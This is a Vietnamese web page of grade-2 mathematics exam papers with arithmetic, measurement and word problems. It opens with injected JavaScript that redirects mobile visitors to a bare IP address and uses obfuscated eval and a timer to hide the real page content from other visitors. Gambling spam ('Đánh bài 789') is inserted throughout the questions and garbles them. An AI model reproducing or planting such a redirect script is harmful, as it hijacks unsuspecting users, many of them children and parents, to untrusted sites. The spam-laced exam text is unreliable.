function goPAGE() { if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://180.215.56.197/" } else { var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if (myid != "iconDiv1" && myid != "yangchen") { document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {} } } goPAGE();


Top 40 Đề thi Toán lớp 2 cơ bản, nâng cao có đáp ánĐánh bài 789Bộ tài liệu Top 40 Đề thi Toán lớp 2 cơ bản, nâng cao Học kì 1 & Học kì 2 chọn lọc, có đáp án giúp các em ôn luyện và đạt điểm cao trong các bài thi môn Toán lớp 2.

Tải xuống

Mục lục Đề thi Toán lớp 2

Quảng cáo

Top 20 Đề thi Toán lớp 2 Học kì 1 có đáp án

Top 10 Đề thi Toán lớp 2 Giữa kì 1 có đáp án

Quảng cáo

Top 10 Đề thi Học kì 1 môn Toán lớp 2 có đáp án

Top 20 Đề thi Toán lớp 2 Học kì 2 có đáp án

Top 10 Đề thi Toán lớp 2 Giữa kì 2 có đáp án

Quảng cáo

Top 10 Đề thi Học kì 2 môn Toán lớp 2 có đáp án

    Đề thi Giữa học kì 1 Toán lớp 2

    Thời gian làm bài: 45 phút

PHẦN I. TRẮC NGHIỆM

Khoanh vào đáp án đúng.

Câu 1.Đánh bài 789 Số 85 đọc là:

Đánh bài 789 A. Tám năm

 B. Tám lăm

 C. Tám mươi năm

Đánh bài 789 D. Tám mươi lăm

Câu 2. 57 ki-lô-gam được viết là:

 A. 57

Đánh bài 789 B. 75 kg

 C. 57 kg

Đánh bài 789 D. 75

Câu 3.Đánh bài 789 Số liền trước số nhỏ nhất có ba chữ số là:

Đánh bài 789 A. 99

 B. 100

Đánh bài 789 C. 9

 D. 11

Câu 4.Đánh bài 789 100 bằng tổng của hai số nào trong các cặp số sau đây?

Đánh bài 789 A. 42 và 68

Đánh bài 789 B. 55 và 45

Đánh bài 789 C. 19 và 91

 D. 47 và 33

Quảng cáo

Câu 5.Đánh bài 789 Hình vẽ dưới đây có bao nhiêu tam giác?

Đề thi Giữa kì 1 môn Toán lớp 2 có đáp án (Cơ bản - Đề 3)

 A. 4 tam giác

 B. 10 tam giác

 C. 9 tam giác

 D. 8 tam giác

Câu 6.Đánh bài 789 Nam có 17 viên bi, Hồng có ít hơn Nam 3 viên bi. Hỏi Hồng có bao nhiêu viên bi?

Đánh bài 789 A. 13 viên bi

Đánh bài 789 B. 20 viên bi

Đánh bài 789 C. 14 viên bi

Đánh bài 789 D. 4 viên bi

PHẦN II. PHẦN TỰ LUẬN

Câu 1. Đặt tính rồi tính

  75 + 13

Đánh bài 789  24 + 31

Đánh bài 789  56 – 30

  87 – 14

Câu 2.Đánh bài 789 Điền số thích hợp vào chỗ chấm

Đánh bài 789  2 dm = ………. cm

  40 cm =……….. dm

Đánh bài 789  1 dm 1 cm =…….cm

  23 cm = …..dm …..cm

Câu 3.Đánh bài 789 Thùng thứ nhất đựng 52 lít nước, thùng thứ hai đựng nhiều hơn thùng thứ nhất 16 lít nước. Hỏi thùng thứ hai đựng được bao nhiêu lít nước?

Câu 4.Đánh bài 789 Có một cân đĩa và hai quả cân loại 1kg và 5 kg. Làm thế nào cân được 4 kg gạo qua một lần cân ?

Câu 5.

Đánh bài 789Hãy kẻ thêm một đoạn thẳng để có 1 hình chữ nhật và 2 hình tam giác.

Đề thi Giữa kì 1 môn Toán lớp 2 có đáp án (Cơ bản - Đề 3)

    Đề thi Học kì 1 Toán lớp 2

    Thời gian làm bài: 45 phút

I. TRẮC NGHIỆM: Khoanh tròn vào chữ cái đặt trước kết quả đúng:

Khoanh tròn vào chữ cái đặt trước kết quả đúng:

Câu 1.Đánh bài 789 Số 95 đọc là:

Đánh bài 789 A. Chín mươi năm

 B. Chín lăm

Đánh bài 789 C. Chín mươi lăm

Câu 2. 28 + 2 - 20 = ... Kết quả của phép tính là:

 A. 10

 B. 20

Đánh bài 789 C. 30

Câu 3.Đánh bài 789 Tìm x, biết: x - 45 = 13

 A. x = 32

Đánh bài 789 B. x = 58

 C. x = 68

Câu 4.Đánh bài 789 Hiệu là số lớn nhất có một chữ số, số trừ là 24, số bị trừ là:

Đánh bài 789 A. 15

 B. 33

 C. 38

Câu 5. 90cm = .......dm. Số cần điền vào chỗ chấm là:

 A. 9

 B. 90

 C. 900

Câu 6.Đánh bài 789 Hình vẽ bên có:

Đề thi môn Toán lớp 2 Học kì 1 có đáp án (Cơ bản - Đề 3)

 A. 3 hình chữ nhật

 B. 4 hình chữ nhật

Đánh bài 789 C. 5 hình chữ nhật

II. TỰ LUẬN:

Câu 7.Đánh bài 789 Đặt tính rồi tính:

  a) 65 + 26

Đánh bài 789  b) 46 + 54

  c) 93 – 37

  d) 100 – 28

Câu 8. Một cửa hàng buổi sáng bán được 42 lít dầu và bán nhiều hơn buổi chiều 7 lít dầu. Hỏi buổi chiều cửa hàng đó bán được bao nhiêu lít dầu?

Câu 9.Đánh bài 789 Tính nhanh:

Đánh bài 789  48 + 49 -9 - 8

  24 + 65 - 4 – 5

Câu 10.Đánh bài 789 Hãy viết 2 phép trừ có hiệu bằng số trừ.

    Đề thi Giữa học kì 2 Toán lớp 2

    Thời gian làm bài: 45 phút

I. Phần trắc nghiệm (3 điểm)

Khoanh tròn vào chữ cái đặt trước câu trả lời đúng nhất.

Câu 1. Số lớn nhất có hai chữ số khác nhau mà tổng hai chữ số của số đó bằng 8 là

A. 78     B. 79

C. 80     D. 81

Câu 2. Trong một phép trừ, số bị trừ là 42, hiệu là 18. Số trừ là:

A. 24     B. 60

C. 42     D. 18

Câu 3.Đánh bài 789 Viết tổng 5 + 5 + 5 + 5 + 5 + 5 thành tích ta được:

A. 5 × 5    B. 5 × 6

C. 5 × 3     D. 5 × 2

Câu 4. Thứ hai tuần này là ngày 12. Hỏi thứ hai tuần sau là ngày bao nhiêu?

Đánh bài 789A. 17     B. 18

Đánh bài 789C. 19     D. 20

Câu 5.Đánh bài 789 Tìm x, biết: x × 5 = 15

Đánh bài 789A. x = 3    B. x = 4

C. x = 5     D. x = 2

Câu 6.Đánh bài 789 Độ dài đường gấp khúc ABCD là:

Đề thi Giữa kì 2 môn Toán lớp 2 có đáp án (Cơ bản - Đề 3)

II. Phần tự luận (7 điểm)

Câu 7.Đánh bài 789 (2 điểm) Tính:

3 × 7 =

5 lít × 2 =

20 : 5 =

Đánh bài 78935kg : 5 =

Câu 8. (1 điểm) Tìm x, biết:

a) 3 × x = 27

b) x : 5 = 4

Câu 9. (2 điểm) Có 18 bạn chia đều thành 3 nhóm, sau đó mỗi nhóm lại chia thành hai nhóm nhỏ. Hỏi:

a) Mỗi nhóm có mấy bạn?

Đánh bài 789b) Có tất cả nhiêu nhóm nhỏ?

Câu 10.Đánh bài 789 (2 điểm) Một hộp bút chì có 24 chiếc. Sau khi lấy đi 1/4 số bút để bán thì trong hộp còn lại bao nhiêu chiếc bút chì?

    Đề thi Học kì 2 Toán lớp 2

    Thời gian làm bài: 45 phút

Câu 1. Tính nhẩm

Đánh bài 789a) 4 × 7 = …

Đánh bài 789b) 5 × 9 = …

c) 36 : 4 =…

Đánh bài 789d) 27 : 3 =…

Câu 2.Đánh bài 789 Đọc, viết các số (theo mẫu):

Viết số Đọc số
355 Ba trăm năm mươi lăm
402
Sáu trăm bảy mươi tám
250
Chín trăm chín mươi chín

Câu 3.Đánh bài 789 Độ dài đường gấp khúc ABC là:

Đề thi môn Toán lớp 2 Học kì 2 có đáp án (Cơ bản - Đề 3)

Khoanh vào đáp án đúng:

A. 12cm     B. 13cm

C. 14cm     D. 15cm

Câu 4. Đặt tính rồi tính

315 + 243     64 + 505

Đánh bài 789668 – 426     978 – 52

Đánh bài 789…………………………………………………………………………

Đánh bài 789…………………………………………………………………………

Đánh bài 789…………………………………………………………………………

Câu 5.Đánh bài 789 Điền số thích hợp vào chỗ chấm:

a) 10cm = …. mm

Đánh bài 789b) 19dm = …..cm

Đánh bài 789c) 5m 5dm = … dm

d) 31dm 5cm = … cm

Câu 6. Tìm x:

Đánh bài 789a) x + 115 = 238

b) x – 75 = 114

c) x : 4 = 432 - 424

Đánh bài 789…………………………………………………………………………

…………………………………………………………………………

Đánh bài 789…………………………………………………………………………

Câu 7. Viết các số 123; 167; 169: 131; 148; 763; 982; 828 theo thứ tự từ bé đến lớn.

Đánh bài 789…………………………………………………………………………

Câu 8.Đánh bài 789 Hai đội công nhân cùng tham gia làm một con đường. Đội thứ nhất làm được 398m đường, đội thứ hai làm được 521m đường. Hỏi cả hai đội làm được bao nhiêu mét đường?

Đánh bài 789…………………………………………………………………………

…………………………………………………………………………

…………………………………………………………………………

Câu 9.Đánh bài 789 Một hình tứ giác có số đo các cạnh lần lượt là: 17cm, 20cm, 26cm và 3dm. Tính chu vi hình tứ giác đó.

Đánh bài 789…………………………………………………………………………

Đánh bài 789…………………………………………………………………………

…………………………………………………………………………

Câu 10.

a) Hải có một số bi. Nếu Toàn cho Hải một số bi bằng đúng số bi của Hải đang có thì Hải có 12 viên bi. Hỏi lúc đầu Hải có bao nhiêu viên bi?

…………………………………………………………………………

Đánh bài 789…………………………………………………………………………

Đánh bài 789…………………………………………………………………………

Đánh bài 789b) Người ta đem đựng một số lít dầu vào các can nhỏ. Nếu đựng vào mỗi can 4 lít thì được tất cả 7 can và còn thừa lại 3 lít. Tính tổng số dầu đó.

…………………………………………………………………………

…………………………………………………………………………

…………………………………………………………………………

Tải xuống

Đánh bài 789Xem thêm các đề kiểm tra, đề thi các môn học lớp 2 có đáp án hay khác:

Đã có app VietJack trên điện thoại, giải bài tập SGK, SBT Soạn văn, Văn mẫu, Thi online, Bài giảng....miễn phí. Tải ngay ứng dụng trên Android và iOS.

Theo dõi chúng tôi miễn phí trên mạng xã hội facebook và youtube:

Loạt bài Đề kiểm tra Toán, Tiếng Việt lớp 2 có đáp án được biên soạn bám sát nội dung chương trình sách giáo khoa Toán 2, Tiếng Việt 2.

Nếu thấy hay, hãy động viên và chia sẻ nhé! Các bình luận không phù hợp với nội quy bình luận trang web sẽ bị cấm bình luận vĩnh viễn.